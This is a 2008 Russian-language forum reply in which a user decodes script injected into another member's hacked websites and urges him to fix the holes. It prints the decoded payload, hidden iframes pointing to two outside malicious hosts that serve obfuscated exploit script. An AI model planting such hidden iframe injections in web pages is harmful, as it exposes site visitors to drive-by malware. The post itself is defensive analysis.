IMHO.WS - Показать сообщение отдельно

Saruman · 03.01.2008, 11:16

Псих
Сломал твои сайты кто-то и эксплойт на них повесил. Приведённый тобой код расшифровывается в следующее:

Код:

</textatea></textarea><IFRAME src="http://spl.vip-ddos.org/index.php" width=3 height=3 style="display:none"></IFRAME>

по ссылке из iframe вытягивается ещё кусок яваскрипта, закодированный в JScript.Encode, он в свою очередь даёт новый фрейм:

Код:

<iframe src="http://wm-servis.cn/out.php?s_id=1" height=1 width=1></iframe>

Этот сервер у меня уже не отвечает - возможно, уже убили. Но, ессно, т.к. первый жив - может в любой момент переключиться на новый источник, так что чем быстрее ты устранишь дыры и уберёшь эти скрипты со своих сайтов - тем здоровее будут твои посетители.

03.01.2008, 11:16	# 13
Saruman ::VIP:: Регистрация: 12.11.2002 Адрес: Nicosia, Cyprus Сообщения: 1 285	Псих Сломал твои сайты кто-то и эксплойт на них повесил. Приведённый тобой код расшифровывается в следующее: Код: </textatea></textarea><IFRAME src="http://spl.vip-ddos.org/index.php" width=3 height=3 style="display:none"></IFRAME> по ссылке из iframe вытягивается ещё кусок яваскрипта, закодированный в JScript.Encode, он в свою очередь даёт новый фрейм: Код: <iframe src="http://wm-servis.cn/out.php?s_id=1" height=1 width=1></iframe> Этот сервер у меня уже не отвечает - возможно, уже убили. Но, ессно, т.к. первый жив - может в любой момент переключиться на новый источник, так что чем быстрее ты устранишь дыры и уберёшь эти скрипты со своих сайтов - тем здоровее будут твои посетители. __________________ "If people only knew how hard I work to gain my mastery, it wouldn't seem so wonderful at all." Michelangelo Buonarroti